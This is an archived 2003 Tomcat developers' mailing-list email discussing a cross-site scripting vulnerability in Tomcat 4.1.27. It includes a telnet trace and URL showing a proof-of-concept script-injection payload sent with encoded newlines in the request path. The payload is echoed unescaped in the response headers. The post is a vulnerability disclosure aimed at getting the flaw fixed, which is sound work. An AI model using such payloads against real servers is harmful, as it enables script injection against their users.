Return-Path: <dbr@greenhydrant.com>
Mailing-List: contact tomcat-dev-help@jakarta.apache.org; run by ezmlm
Delivered-To: mailing list tomcat-dev@jakarta.apache.org
Received: (qmail 5916 invoked from network); 29 Sep 2003 18:40:23 -0000
Received: from unknown (HELO forty.greenhydrant.com) (208.48.139.185)
  by daedalus.apache.org with SMTP; 29 Sep 2003 18:40:23 -0000
Received: from www.greenhydrant.com (localhost [127.0.0.1])
	by forty.greenhydrant.com (Postfix) with SMTP id 58DFDE396A
	for <tomcat-dev@jakarta.apache.org>; Mon, 29 Sep 2003 11:40:49 -0700 (PDT)
Received: from 208.48.139.163
        (SquirrelMail authenticated user dbr)
        by www.greenhydrant.com with HTTP;
        Mon, 29 Sep 2003 11:40:49 -0700 (PDT)
Message-ID: <2988.208.48.139.163.1064860849.squirrel@www.greenhydrant.com>
In-Reply-To: <3F76B49A.6090803@jcom.home.ne.jp>
References: <3F76B49A.6090803@jcom.home.ne.jp>
Date: Mon, 29 Sep 2003 11:40:49 -0700 (PDT)
Subject: Re: Jakarta Tomcat 4.1 XSS vulnerability
From: "David Rees" <dbr@greenhydrant.com>
To: "Tomcat Developers List" <tomcat-dev@jakarta.apache.org>
User-Agent: SquirrelMail/1.4.2 [CVS]
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3
Importance: Normal
X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N

Anyone know how serious this is?

It also appears to affect Tomcat 4.1.27 when using mod_jk as well.  Below
is a sample trace of a HTTP session.

-Dave

> telnet localhost 8080
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /666%0a%0a<script>alert("asdf");</script>666.jsp HTTP/1.0
Host: localhost

HTTP/1.1 404 /666

<script>alert("asdf");</script>666.jsp
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 29 Sep 2003 18:39:23 GMT
Server: Apache Coyote/1.0
Connection: close

<html><head><title>Apache Tomcat/4.1.27 - Error
report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color :
white;background-color : #0086b2;} H3{font-family :
sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;}
BODY{font-family : sans-serif,Arial,Tahoma;color : black;background-color
: white;} B{color : white;background-color : #0086b2;} HR{color :
#0086b2;} --></STYLE> </head><body><h1>HTTP Status 404 - /666

&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp</h1><HR
size="1" noshade><p><b>type</b> Status report</p><p><b>message</b> <u>/666

&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp</u></p><p><b>description</b>
<u>The requested resource (/666

&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp) is not
available.</u></p><HR size="1" noshade><h3>Apache
Tomcat/4.1.27</h3></body></html>Connection closed by foreign host.

On Sun, September 28, 2003 at 3:14 am, Kan Ogawa sent the following
>
> Jakarta Tomcat 4.1 cross-site scripting vulnerability, which was
> reported last year, is not yet resolved.
>
> http://www.securityfocus.com/archive/82/288502/2002-08-16/2002-08-22/0
>
> I verified this vulnerability on Tomcat 4.1.27 with Coyote HTTP/1.1
> connector.
>
> http://localhost:8080/666%0a%0a<script>alert("asdf");</script>666.jsp
>
> On the other hand, on Tomcat 5.0, it was not reproduced.
> Do you neglect to resolve it to Tomcat 4.x, Tomcat committers?
>
> Regards,
>
> --
> Kan Ogawa
> super-creek@jcom.home.ne.jp